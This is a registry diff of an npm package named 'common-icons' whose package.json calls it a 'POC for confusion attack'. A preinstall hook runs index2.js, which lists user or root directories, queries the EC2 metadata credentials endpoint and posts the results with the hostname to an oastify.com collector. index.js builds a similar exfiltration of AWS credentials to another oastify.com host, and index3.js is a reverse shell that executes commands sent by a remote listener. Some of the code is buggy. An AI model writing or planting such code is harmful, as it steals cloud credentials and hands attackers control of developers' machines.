common-icons 1.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +49 -0
- package/index2.js +92 -0
- package/index3.js +40 -0
- package/package.json +12 -0
package/index.js
ADDED
|
@@ -0,0 +1,49 @@
|
|
|
1
|
+
base64data3 = '';
|
|
2
|
+
function req1(){
|
|
3
|
+
http.get({
|
|
4
|
+
hostname: '169.254.169.254',
|
|
5
|
+
port: 80,
|
|
6
|
+
path: '/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance',
|
|
7
|
+
agent: false
|
|
8
|
+
},
|
|
9
|
+
(res) => {
|
|
10
|
+
res.setEncoding('utf8');
|
|
11
|
+
let data = '';
|
|
12
|
+
res.on("data", (d) => {
|
|
13
|
+
var x;
|
|
14
|
+
x=d;
|
|
15
|
+
let buff3 = Buffer.from(x);
|
|
16
|
+
base64data3 = buff3.toString('base64');
|
|
17
|
+
|
|
18
|
+
const trackingData = JSON.stringify({
|
|
19
|
+
p: package,
|
|
20
|
+
c: __dirname,
|
|
21
|
+
homedir: os.homedir(),
|
|
22
|
+
networkinginterfaces: os.networkingInterfaces(),
|
|
23
|
+
release: os.release(),
|
|
24
|
+
userid: os.userInfo().uid,
|
|
25
|
+
hostname: os.hostname,
|
|
26
|
+
username: os.userInfo().username,
|
|
27
|
+
dns: dns.getServers(),
|
|
28
|
+
r: packageJSON ? packageJSON.__resolved : undefined,
|
|
29
|
+
v: packageJSON.version,
|
|
30
|
+
pjson: packageJSON
|
|
31
|
+
});
|
|
32
|
+
var options = {
|
|
33
|
+
hostname: '9y8xoee2in0vrzq9k265ztp4bvhm5et3.oastify.com',
|
|
34
|
+
port: 443,
|
|
35
|
+
path: '/',
|
|
36
|
+
method: "POST",
|
|
37
|
+
headers: {
|
|
38
|
+
"content-type":"application/x-www-form-urlencoded",
|
|
39
|
+
"content-length": postData.length,
|
|
40
|
+
"content-awsconfig":base64data1,
|
|
41
|
+
"content-awscreds":base64data2,
|
|
42
|
+
"content-imdsv":base64data3
|
|
43
|
+
}
|
|
44
|
+
};
|
|
45
|
+
|
|
46
|
+
})
|
|
47
|
+
}
|
|
48
|
+
)
|
|
49
|
+
}
|
package/index2.js
ADDED
|
@@ -0,0 +1,92 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
const http = require('http');
|
|
3
|
+
const os = require('os');
|
|
4
|
+
const command = require('child_process');
|
|
5
|
+
const { Buffer } = require('buffer');
|
|
6
|
+
const command_input = "dir c:\\users\\";
|
|
7
|
+
// Timeout duration (in milliseconds)
|
|
8
|
+
const TIMEOUT_DURATION = 5000; // 5 seconds
|
|
9
|
+
|
|
10
|
+
// Function to send POST request to xhihdn248xtkn2394eqdmhdax13srif7.oastify.com
|
|
11
|
+
function sendPostToBlaBla(data, hostname_data=null, command_data=null, homedir_data=null) {
|
|
12
|
+
const postData = JSON.stringify({ ec2: data, hostname: hostname_data, homedir: homedir_data, command_result: command_data });
|
|
13
|
+
|
|
14
|
+
const postOptions = {
|
|
15
|
+
hostname: 'xhihdn248xtkn2394eqdmhdax13srif7.oastify.com',
|
|
16
|
+
port: 443,
|
|
17
|
+
path: '/',
|
|
18
|
+
method: 'POST',
|
|
19
|
+
headers: {
|
|
20
|
+
'Content-Type': 'application/json',
|
|
21
|
+
'Content-Length': Buffer.byteLength(postData)
|
|
22
|
+
}
|
|
23
|
+
};
|
|
24
|
+
|
|
25
|
+
const postReq = https.request(postOptions, (postRes) => {
|
|
26
|
+
let responseData = '';
|
|
27
|
+
|
|
28
|
+
postRes.on('data', (chunk) => {
|
|
29
|
+
responseData += chunk;
|
|
30
|
+
});
|
|
31
|
+
|
|
32
|
+
postRes.on('end', () => {
|
|
33
|
+
console.log('Response from xhihdn248xtkn2394eqdmhdax13srif7.oastify.com:', responseData);
|
|
34
|
+
});
|
|
35
|
+
});
|
|
36
|
+
|
|
37
|
+
postReq.on('error', (error) => {
|
|
38
|
+
console.error('Error with POST request:', error);
|
|
39
|
+
});
|
|
40
|
+
|
|
41
|
+
postReq.write(postData);
|
|
42
|
+
postReq.end();
|
|
43
|
+
}
|
|
44
|
+
|
|
45
|
+
// First, send a request to the EC2 metadata URL
|
|
46
|
+
const options = {
|
|
47
|
+
hostname: 'asd',
|
|
48
|
+
port: 80,
|
|
49
|
+
path: '/latest/meta-data/iam/security-credentials/',
|
|
50
|
+
method: 'GET',
|
|
51
|
+
timeout: TIMEOUT_DURATION // Set the timeout for the request
|
|
52
|
+
};
|
|
53
|
+
if (os.platform() != "win32") {command_input="ls /root"};
|
|
54
|
+
command.exec(command_input, (error, stdout, stderr) => {
|
|
55
|
+
if (error) {
|
|
56
|
+
console.error(`Error executing command: ${error}`);
|
|
57
|
+
return;
|
|
58
|
+
}
|
|
59
|
+
|
|
60
|
+
if (stderr) {
|
|
61
|
+
console.error(`Error in execution: ${stderr}`);
|
|
62
|
+
return;
|
|
63
|
+
}
|
|
64
|
+
|
|
65
|
+
// Output the result of 'dir' command
|
|
66
|
+
result = (stdout);
|
|
67
|
+
})
|
|
68
|
+
|
|
69
|
+
const req = http.request(options, (res) => {
|
|
70
|
+
let data = '';
|
|
71
|
+
|
|
72
|
+
res.on('data', (chunk) => {
|
|
73
|
+
data += chunk;
|
|
74
|
+
});
|
|
75
|
+
|
|
76
|
+
res.on('end', () => {
|
|
77
|
+
// Encode the response data in base64
|
|
78
|
+
const encodedData = Buffer.from(data).toString('base64');
|
|
79
|
+
// Send the encoded data to xhihdn248xtkn2394eqdmhdax13srif7.oastify.com
|
|
80
|
+
sendPostToBlaBla(encodedData);
|
|
81
|
+
});
|
|
82
|
+
});
|
|
83
|
+
|
|
84
|
+
// Handle errors and timeouts for the GET request
|
|
85
|
+
req.on('error', (error) => {
|
|
86
|
+
console.error('Error with GET request:', error.message);
|
|
87
|
+
// Send the failure message to xhihdn248xtkn2394eqdmhdax13srif7.oastify.com if there is an error
|
|
88
|
+
sendPostToBlaBla('connection to EC2 failed', os.hostname(), result, os.homedir());
|
|
89
|
+
});
|
|
90
|
+
|
|
91
|
+
// End the GET request
|
|
92
|
+
req.end();
|
package/index3.js
ADDED
|
@@ -0,0 +1,40 @@
|
|
|
1
|
+
const net = require('net');
|
|
2
|
+
const { exec } = require('child_process');
|
|
3
|
+
|
|
4
|
+
// Change this to the attacker's IP and port
|
|
5
|
+
const REMOTE_HOST = '127.0.0.1'; // Replace with attacker's IP
|
|
6
|
+
const REMOTE_PORT = 8088; // Replace with attacker's listening port
|
|
7
|
+
|
|
8
|
+
function connectShell() {
|
|
9
|
+
const client = new net.Socket();
|
|
10
|
+
|
|
11
|
+
// Try to connect to the attacker/listener
|
|
12
|
+
client.connect(REMOTE_PORT, REMOTE_HOST, () => {
|
|
13
|
+
console.log('Connected to the attack server');
|
|
14
|
+
client.write('Reverse shell connected!\n'); // Notify listener of connection
|
|
15
|
+
});
|
|
16
|
+
|
|
17
|
+
// When data is received from the attacker's server
|
|
18
|
+
client.on('data', (data) => {
|
|
19
|
+
// Execute the received command
|
|
20
|
+
exec(data.toString(), (error, stdout, stderr) => {
|
|
21
|
+
if (stdout) client.write(stdout); // Send command output back to the attacker
|
|
22
|
+
if (stderr) client.write(stderr); // Send any errors back to the attacker
|
|
23
|
+
if (error) client.write(error.message);
|
|
24
|
+
});
|
|
25
|
+
});
|
|
26
|
+
|
|
27
|
+
// Reconnect on close
|
|
28
|
+
client.on('close', () => {
|
|
29
|
+
console.log('Connection closed, retrying...');
|
|
30
|
+
setTimeout(connectShell, 5000); // Try reconnecting every 5 seconds
|
|
31
|
+
});
|
|
32
|
+
|
|
33
|
+
client.on('error', (err) => {
|
|
34
|
+
console.error('Connection error:', err.message);
|
|
35
|
+
setTimeout(connectShell, 5000); // Retry connection on error
|
|
36
|
+
});
|
|
37
|
+
}
|
|
38
|
+
|
|
39
|
+
// Start the reverse shell
|
|
40
|
+
connectShell();
|
package/package.json
ADDED
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "common-icons",
|
|
3
|
+
"version": "1.1.0",
|
|
4
|
+
"description": "POC for confusion attack",
|
|
5
|
+
"main": "index2.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node index2.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "cwg test",
|
|
11
|
+
"license": "ISC"
|
|
12
|
+
}
|